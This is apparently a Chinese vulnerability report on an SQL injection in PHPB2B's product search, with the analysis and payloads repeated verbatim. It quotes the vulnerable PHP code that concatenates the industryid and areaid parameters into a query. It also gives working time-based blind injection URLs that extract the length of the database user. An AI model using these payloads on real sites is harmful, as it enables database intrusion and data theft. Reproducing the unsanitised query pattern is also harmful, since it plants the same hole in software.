### 简要描述:
PHPB2B某处sql注入#3
### 详细说明:
PHPB2B某处sql注入
官网最新版本
libraries/core/controllers/product_controller.php
176-187行
```
function lists()
{
global $pos, $viewhelper;
$viewhelper->setPosition(L("product_center", 'tpl'), 'index.php?do=product');
$viewhelper->setTitle(L("product_center", 'tpl'));
setvar("module", "product");
$this->product->initSearch();
$result = $this->product->Search($pos, $this->displaypg);
setvar("items", $result);
$this->view->assign("total_count", $this->product->amount);
render("product/list");
}
```
这里调用了一个函数product->initsearch()
跟入
libraries/core/models/product_controller.php
```
function initSearch()
{
uses("industry","area");
$this->area = new Areas();
$this->industry = new Industries();
$this->condition[] = "Product.status=1 ";
if (isset($_GET['industryid'])) {
if (strpos($_GET['industryid'], ",")!==false) {
$this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")";
}else{
$industryid = intval($_GET['industryid']);
$sub_ids = $this->industry->getSubDatas($industryid);
$sub_ids = array_keys($sub_ids);
$sub_ids = array_filter($sub_ids);
$this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")";
}
}
if (isset($_GET['areaid'])) {
if (strpos($_GET['areaid'], ",")!==false) {
$this->condition[]= "Product.area_id IN (".trim($_GET['areaid']).")";
}else{
$areaid = intval($_GET['areaid']);
$this->condition[]= "Product.area_id='".$areaid."'";
}
}
if (isset($_GET['type'])) {
if($_GET['type']=="commend"){
$this->condition[] = "Product.if_commend='1'";
}
}
if (!empty($_GET['typeid'])) {
$this->condition[] = "Product.sort_id='".$_GET['typeid']."'";
}
if(!empty($_GET['q'])) {
$searchkeywords = strip_tags($_GET['q']);
$this->condition[]= "Product.name like '%".$searchkeywords."%'";
}
if (isset($_GET['pubdate'])) {
switch ($_GET['pubdate']) {
case "l3":
$this->condition[] = "Product.created>".($this->timestamp-3*86400);
break;
case "l10":
$this->condition[] = "Product.created>".($this->timestamp-10*86400);
break;
case "l30":
$this->condition[] = "Product.created>".($this->timestamp-30*86400);
break;
default:
break;
}
}
if (!empty($_GET['total_count'])) {
$this->amount = intval($_GET['total_count']);
}else{
$this->amount = $this->findCount();
}
if (!empty($_GET['orderby'])) {
switch ($_GET['orderby']) {
case "dateline":
$this->orderby = "created DESC";
break;
default:
break;
}
}
}
```
代码大同小异,只看一处
```
if (isset($_GET['industryid'])) {
if (strpos($_GET['industryid'], ",")!==false) {
$this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")";
}else{
$industryid = intval($_GET['industryid']);
$sub_ids = $this->industry->getSubDatas($industryid);
$sub_ids = array_keys($sub_ids);
$sub_ids = array_filter($sub_ids);
$this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")";
}
}
```
如果传入的industryid中存在逗号,就拼接后加入condition数组中,没有强制类型转换,也没有单引号保护。
然后接着看libraries/core/models/product_controller.php
$result = $this->product->Search($pos, $this->displaypg);
执行了搜索。
其中又是一大堆拼接,转化,但是都跟我们没关系。我们直接看最后执行的sql语句。
访问
```
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=0),sleep(30),0)%23
```
[<img src="https://images.seebug.org/upload/201501/061643440b74a61ac0c3b55a61b0337bfebf413a.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/061643440b74a61ac0c3b55a61b0337bfebf413a.png)
于是可以注入啦
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>10),sleep(30),0)%23
成功延时
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>15),sleep(30),0)%23
不延时
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=14),sleep(30),0)%23
延时成功
确定user()长度为14位
不再演示了。剩下的嘿嘿。。
### 漏洞证明:
PHPB2B某处sql注入
官网最新版本
libraries/core/controllers/product_controller.php
176-187行
```
function lists()
{
global $pos, $viewhelper;
$viewhelper->setPosition(L("product_center", 'tpl'), 'index.php?do=product');
$viewhelper->setTitle(L("product_center", 'tpl'));
setvar("module", "product");
$this->product->initSearch();
$result = $this->product->Search($pos, $this->displaypg);
setvar("items", $result);
$this->view->assign("total_count", $this->product->amount);
render("product/list");
}
```
这里调用了一个函数product->initsearch()
跟入
libraries/core/models/product_controller.php
```
function initSearch()
{
uses("industry","area");
$this->area = new Areas();
$this->industry = new Industries();
$this->condition[] = "Product.status=1 ";
if (isset($_GET['industryid'])) {
if (strpos($_GET['industryid'], ",")!==false) {
$this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")";
}else{
$industryid = intval($_GET['industryid']);
$sub_ids = $this->industry->getSubDatas($industryid);
$sub_ids = array_keys($sub_ids);
$sub_ids = array_filter($sub_ids);
$this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")";
}
}
if (isset($_GET['areaid'])) {
if (strpos($_GET['areaid'], ",")!==false) {
$this->condition[]= "Product.area_id IN (".trim($_GET['areaid']).")";
}else{
$areaid = intval($_GET['areaid']);
$this->condition[]= "Product.area_id='".$areaid."'";
}
}
if (isset($_GET['type'])) {
if($_GET['type']=="commend"){
$this->condition[] = "Product.if_commend='1'";
}
}
if (!empty($_GET['typeid'])) {
$this->condition[] = "Product.sort_id='".$_GET['typeid']."'";
}
if(!empty($_GET['q'])) {
$searchkeywords = strip_tags($_GET['q']);
$this->condition[]= "Product.name like '%".$searchkeywords."%'";
}
if (isset($_GET['pubdate'])) {
switch ($_GET['pubdate']) {
case "l3":
$this->condition[] = "Product.created>".($this->timestamp-3*86400);
break;
case "l10":
$this->condition[] = "Product.created>".($this->timestamp-10*86400);
break;
case "l30":
$this->condition[] = "Product.created>".($this->timestamp-30*86400);
break;
default:
break;
}
}
if (!empty($_GET['total_count'])) {
$this->amount = intval($_GET['total_count']);
}else{
$this->amount = $this->findCount();
}
if (!empty($_GET['orderby'])) {
switch ($_GET['orderby']) {
case "dateline":
$this->orderby = "created DESC";
break;
default:
break;
}
}
}
```
代码大同小异,只看一处
```
if (isset($_GET['industryid'])) {
if (strpos($_GET['industryid'], ",")!==false) {
$this->condition[]= "Product.industry_id IN (".trim($_GET['industryid']).")";
}else{
$industryid = intval($_GET['industryid']);
$sub_ids = $this->industry->getSubDatas($industryid);
$sub_ids = array_keys($sub_ids);
$sub_ids = array_filter($sub_ids);
$this->condition[]= "Product.industry_id IN (".implode(",", $sub_ids).")";
}
}
```
如果传入的industryid中存在逗号,就拼接后加入condition数组中,没有强制类型转换,也没有单引号保护。
然后接着看libraries/core/models/product_controller.php
$result = $this->product->Search($pos, $this->displaypg);
执行了搜索。
其中又是一大堆拼接,转化,但是都跟我们没关系。我们直接看最后执行的sql语句。
访问
```
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=0),sleep(30),0)%23
```
[<img src="https://images.seebug.org/upload/201501/061643440b74a61ac0c3b55a61b0337bfebf413a.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/061643440b74a61ac0c3b55a61b0337bfebf413a.png)
于是可以注入啦
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>10),sleep(30),0)%23
成功延时
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())>15),sleep(30),0)%23
不延时
localhost/phpb2b/?do=product&action=list&industryid=1,234)||if((length(user())=14),sleep(30),0)%23
延时成功
确定user()长度为14位
不再演示了。剩下的嘿嘿。。
京公网安备 11010502034610号
暂无评论